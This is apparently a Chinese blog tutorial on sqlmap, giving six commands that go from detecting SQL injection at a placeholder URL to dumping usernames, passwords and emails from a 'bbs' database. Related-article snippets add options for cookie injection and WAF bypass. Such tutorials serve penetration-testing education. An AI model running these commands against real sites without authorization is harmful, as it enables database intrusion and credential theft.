SQLMap的使用

最新推荐文章于 2024-07-30 00:01:49 发布
原创 最新推荐文章于 2024-07-30 00:01:49 发布 · 266 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 

SQLMap最早是在命令行下运行的工具,SQLmap提供了丰富的命令参数,使用起来极其灵活。SQLmap的命令一般都是通用的,只有极少数命令是针对个别数据库的。
已知存在注入点http://www.xxser.com/user.jsp?id=1,使用SQLmap对其提取管理员数据具体步骤如下:

1. 判断是否存在注入点:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1
使用 -u 参数指定URL,如果URL存在注入点,将会显示出web容器,数据库版本信息。

2.获取数据库:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –dbs
使用 -dbs 参数读取数据库

3.查看当前应用程序所用数据库:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –current -db
使用–current -db参数列出当前应用程序所使用的数据库;

4 .列出指定数据库的所有表:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –table -D “bbs”
使用–table参数获取数据库,-D参数指定数据库;

5.读取指定表中的字段名称:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –columns -T “User” -D “bbs”
使用–columns参数列取字段名;

6.读取指定字段中的内容:
sqlmap.py -u “http://www.xxser.com/user.jsp?id=1” –dump -C “UserName,PassWord,Email” -T “[User]” -D “bbs”
–dump 意为转存数据,-C指定字段名称,-T指定表名(因user属于数据库关键字,所以建议加上[]),-D指定数据库名称。
通过以上六个步骤就可以轻松地对存在漏洞的URL读取数据。

优呦嘿
关注
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap使用手册(SQLMap下载、安装、使用)
啊渊的专栏
01-16 493
数据库指纹识别从数据库中获取数据访问底层文件系统在操作系统上执行命令它全面支持多种数据库管理系统,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等。此外,sqlmap还支持多种SQL注入技术,包括基于布尔盲、基于时间盲、基于错误、基于UNION查询、堆栈查询和带外查询等。
Sqlmap通用参数
一米八多的瑞兹的博客
02-25 642
Sqlmap通用参数 1. Sqlmap设置盲注字符集 在基于布尔和基于时间的SQL盲注中,用户可以强制使用自定义字符集来加速数据检索过程。 例如,如果转储消息摘要值(例如SHA1),则使用–charset=“0123456789abcdef”,预期请求数量比正常运行少30%左右。 2. Sqlmap爬取URL sqlmap可以通过从目标位置开始收集链接(爬行)来收集潜在的脆弱链接。使用此选项,用户可以设置一个深度(到起始位置的距离),低于这个深度,sqlmap不会进入收集阶段,因为只要有新的链接要访问,
SQLMAP参数中文解说
weixin_33835690的博客
03-16 415
#HiRoot's Blog Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为1) Target(目标): 以下至少需要设置其中一个选项,设置目标URL。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标URL。 -l LIST 从...
Sqlmap参数
m0_63510587的博客
02-18 1430
参数功能 目标参数 参数:-u 直接输入目标URL 参数:-m 从文件中取出保存的URL进行检测 参数:-r 从文本中获取http请求 参数:-g 测试注入Google的搜索结果的GET参数 参数:-l 从Burp或者WebScarab代理中获取日志 枚举参数 参数:-b,–banner 列出版本号 参数:–dbs 列出所有数据库的库名 参数:–current-db 列出当前使用的数据库库名 参数:–tables 列出数据库中的表
sqlmap参数大全
卖瓜小农的博客
02-23 8791
sqlmap参数大全 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data “指定参数” 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.
sqlmap参数介绍
Jerry____的博客
07-16 1473
如果存在sql注入,获取数据过程 获取数据库 sqlmap -u “http://192.168.120.249/baji/vul/sql/show1.php?id=1” --dbs 获取当前数据库 sqlmap -u “http://192.168.120.249/baji/vul/sql/show1.php?id=1” --current-db 获取数据库中的表 sqlmap -u “http...
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
SQLmap使用
Xlucas的博客
07-30 548
sqlmap 是一个开源的渗透测试工具,专门用于自动化检测和利用SQL注入漏洞,以及对数据库服务器进行数据获取和访问操作系统文件系统。Windows注册表访问(Windows registry access)操作系统访问(Operating system access)2、我们可以通过py sqlmap.py -hh查看命令参数。文件系统访问(File system access)技术(Techniques)注入(Injection)检测(Detection)请求(Request)
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1325
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
sqlmap 相关参数
小锤队长的博客
08-03 640
sqlmap参数选项: -h, -help显示基本帮助信息并退出 -hh 显示高级帮助消息并退出 --version 显示程序的版本号并退出 -v VERBOSE详细级别:0-6(默认1) -u URL, ...
SQLmap参数详解
Williamanddog的博客
01-19 6077
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
sqlmap参数详解
十五年游戏主程转渗透之路
04-09 7684
sqlmap
SqlMap常用参数(一)
whyrookie的博客
08-27 6721
sqlmap可谓是利用sql注入的神器了,sqlmap的参数很多,接下介绍几种常见的参数。 一。注入access数据库常用的参数 sqlmap.py -u "url" //判断参数是否存在注入 sqlmap.py -u "url" --tables //猜解表名 sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名 sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段数据 二。注入MySQL数据库常用参数 ...
SQLMAP的常用参数
信安路上……
03-04 4529
-p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --c...
sqlmap详细的参数功能介绍(全面)
weixin_46709219的博客
11-13 6359
目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置请求方法 POST提交参数 设置参数分隔符 设置Cookie 设置User-Agent Host Referer 额外的HTTP头部 协议认证 设置代理 Tor匿名网络 设置...
SQLMap 使用参数详解
热门推荐
qq_37019068的博客
10-09 2万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
sqlmap使用
最新发布
03-12
### 关于 SQLMap 使用教程 #### 工具概述 SQLMap 是一个功能强大的自动化 SQL 注入工具,可以用来检测并利用 SQL 注入漏洞以接管数据库服务器。此工具不仅能够识别不同类型的注入点,还能执行多种攻击向量,并支持...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值